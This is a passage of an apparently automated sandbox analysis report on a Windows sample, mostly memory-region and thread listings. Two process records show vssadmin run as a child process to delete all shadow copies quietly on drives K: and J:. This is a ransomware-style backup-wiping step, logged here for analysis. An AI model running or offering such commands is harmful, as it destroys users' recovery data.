	        start_va = 0x147e13e0000
	          end_va = 0x147e13e3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000147e13e0000"
	        filename = ""

Region:
	              id = 4850
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 4856
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 4857
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 4858
	        start_va = 0x147e1400000
	          end_va = 0x147e1406fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e1400000"
	        filename = ""

Region:
	              id = 4859
	        start_va = 0x147e1410000
	          end_va = 0x147e1410fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000147e1410000"
	        filename = ""

Region:
	              id = 4860
	        start_va = 0x147e1420000
	          end_va = 0x147e1420fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000147e1420000"
	        filename = ""

Region:
	              id = 4861
	        start_va = 0x147e16c0000
	          end_va = 0x147e16c4fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 4863
	        start_va = 0x147e16d0000
	          end_va = 0x147e16d0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 4864
	        start_va = 0x147e3900000
	          end_va = 0x147e3901fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000147e3900000"
	        filename = ""

Region:
	              id = 4865
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 4866
	        start_va = 0x147e3910000
	          end_va = 0x147e3910fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 4867
	        start_va = 0x147e3920000
	          end_va = 0x147e3921fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000147e3920000"
	        filename = ""


Thread:
	id = 349
	os_tid = 0xa98


Thread:
	id = 351
	os_tid = 0x1354


Thread:
	id = 352
	os_tid = 0xbf8


Thread:
	id = 357
	os_tid = 0x29c


Process:
	id = "63"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x6512e000"
	os_pid = "0x27c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "55"
	os_parent_pid = "0xccc"
	cmd_line = "vssadmin  Delete Shadows /For=K: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 4666
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 4667
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 4668
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 4669
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 4670
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 4671
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 4672
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 4673
	        start_va = 0x100000
	          end_va = 0x101fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 4674
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 4675
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 4676
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 4677
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 4678
	        start_va = 0x7edb0000
	          end_va = 0x7edd2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007edb0000"
	        filename = ""

Region:
	              id = 4679
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4680
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 4681
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 4682
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 4683
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 4690
	        start_va = 0x400000
	          end_va = 0x5bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 4697
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 4698
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 4699
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4706
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 4707
	        start_va = 0x5c0000
	          end_va = 0x7affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005c0000"
	        filename = ""

Region:
	              id = 4713
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4714
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 4716
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 4717
	        start_va = 0x7ecb0000
	          end_va = 0x7edaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ecb0000"
	        filename = ""

Region:
	              id = 4752
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4753
	        start_va = 0x1c0000
	          end_va = 0x1c3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 4754
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 4755
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 4759
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 4760
	        start_va = 0x440000
	          end_va = 0x47ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 4761
	        start_va = 0x5b0000
	          end_va = 0x5bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005b0000"
	        filename = ""

Region:
	              id = 4762
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 4763
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 4764
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 4765
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 4766
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 4771
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 4772
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 4773
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 4774
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 4775
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 4776
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 4783
	        start_va = 0x480000
	          end_va = 0x4bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000480000"
	        filename = ""

Region:
	              id = 4784
	        start_va = 0x4c0000
	          end_va = 0x4fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004c0000"
	        filename = ""

Region:
	              id = 4785
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 4786
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 4787
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 4792
	        start_va = 0x5c0000
	          end_va = 0x69ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005c0000"
	        filename = ""

Region:
	              id = 4793
	        start_va = 0x6b0000
	          end_va = 0x7affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006b0000"
	        filename = ""

Region:
	              id = 4794
	        start_va = 0x1d0000
	          end_va = 0x1f9fff
	       monitored = 0
	     entry_point = 0x1d5680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 4795
	        start_va = 0x4880000
	          end_va = 0x4a07fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004880000"
	        filename = ""

Region:
	              id = 4796
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 4797
	        start_va = 0x1d0000
	          end_va = 0x1dcfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 4798
	        start_va = 0x4a10000
	          end_va = 0x4b90fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004a10000"
	        filename = ""

Region:
	              id = 4799
	        start_va = 0x4ba0000
	          end_va = 0x5f9ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004ba0000"
	        filename = ""

Region:
	              id = 4803
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 4804
	        start_va = 0x1e0000
	          end_va = 0x1e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001e0000"
	        filename = ""

Region:
	              id = 4805
	        start_va = 0x1f0000
	          end_va = 0x1f3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001f0000"
	        filename = ""

Region:
	              id = 4806
	        start_va = 0x5fa0000
	          end_va = 0x6089fff
	       monitored = 0
	     entry_point = 0x5fdd650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 4809
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 5078
	        start_va = 0x500000
	          end_va = 0x500fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000500000"
	        filename = ""

Region:
	              id = 5079
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 5080
	        start_va = 0x510000
	          end_va = 0x510fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000510000"
	        filename = ""

Region:
	              id = 5109
	        start_va = 0x520000
	          end_va = 0x55ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000520000"
	        filename = ""

Region:
	              id = 5110
	        start_va = 0x560000
	          end_va = 0x59ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000560000"
	        filename = ""

Region:
	              id = 5138
	        start_va = 0x5c0000
	          end_va = 0x5fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005c0000"
	        filename = ""

Region:
	              id = 5139
	        start_va = 0x600000
	          end_va = 0x63ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000600000"
	        filename = ""

Region:
	              id = 5140
	        start_va = 0x640000
	          end_va = 0x67ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000640000"
	        filename = ""

Region:
	              id = 5141
	        start_va = 0x690000
	          end_va = 0x69ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000690000"
	        filename = ""

Region:
	              id = 5142
	        start_va = 0x7b0000
	          end_va = 0x7effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007b0000"
	        filename = ""

Region:
	              id = 5260
	        start_va = 0x5fa0000
	          end_va = 0x607ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 5261
	        start_va = 0x6080000
	          end_va = 0x60fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006080000"
	        filename = ""

Region:
	              id = 5262
	        start_va = 0x5a0000
	          end_va = 0x5a8fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 350
	os_tid = 0x13bc


Thread:
	id = 354
	os_tid = 0xd18


Thread:
	id = 355
	os_tid = 0xd0c


Thread:
	id = 374
	os_tid = 0xd28


Thread:
	id = 377
	os_tid = 0xd2c


Thread:
	id = 379
	os_tid = 0x7e8


Process:
	id = "64"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x5116c000"
	os_pid = "0x1248"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "58"
	os_parent_pid = "0x119c"
	cmd_line = "vssadmin  Delete Shadows /For=J: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 4734
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 4735
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 4736
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 4737
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 4738
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 4739
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 4740
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 4741
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 4742
	        start_va = 0x790000
	          end_va = 0x791fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000790000"
	        filename = ""

Region:
	              id = 4743
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 4744
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 4745
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 4746
	        start_va = 0x7f220000
	          end_va = 0x7f242fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f220000"
	        filename = ""

Region:
	              id = 4747
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4748
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 4749
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 4750
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 4751
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 4758
	        start_va = 0x400000
	          end_va = 0x5fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 4769
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 4770
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 4777
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4778
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
